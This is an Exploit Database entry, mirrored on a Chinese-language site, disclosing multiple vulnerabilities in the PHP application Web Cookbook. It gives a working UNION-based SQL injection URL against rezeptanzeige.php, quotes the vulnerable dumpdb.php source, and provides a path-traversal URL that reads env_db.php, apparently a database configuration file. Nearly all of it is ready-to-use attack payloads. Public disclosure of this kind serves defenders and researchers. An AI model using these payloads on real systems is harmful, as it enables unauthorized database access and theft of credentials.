Web Cookbook – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： cr4wl3r
  日期： 2013-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24531/

• # Web Cookbook Multiple Vulnerability
  # By cr4wl3r http://bastardlabs.info
  # Script: http://sourceforge.net/projects/webcookbook/
  # Tested: Win 7
  
  # Proof of Concept
  # SQL Injection
  
  http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]
  http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--
  
  # Remote File Disclosure
  # Bugs found /admin/dumpdb.php
  
  --------------------------
  1 <?php
  2 $outfile = $_GET['outfile'];
  3 header("Content-Type: text/plain");
  4 header("Content-length: " . filesize("../upload/" . $outfile));
  5 header("Content-Disposition: attachment; filename=" . $outfile);
  6 readfile("../upload/" . $outfile);
  7 ?>
  --------------------------
  
  http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]
  http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php
  
  # Demo:
  http://bastardlabs.info/demo/WebCookbook1.png
  http://bastardlabs.info/demo/WebCookbook2.png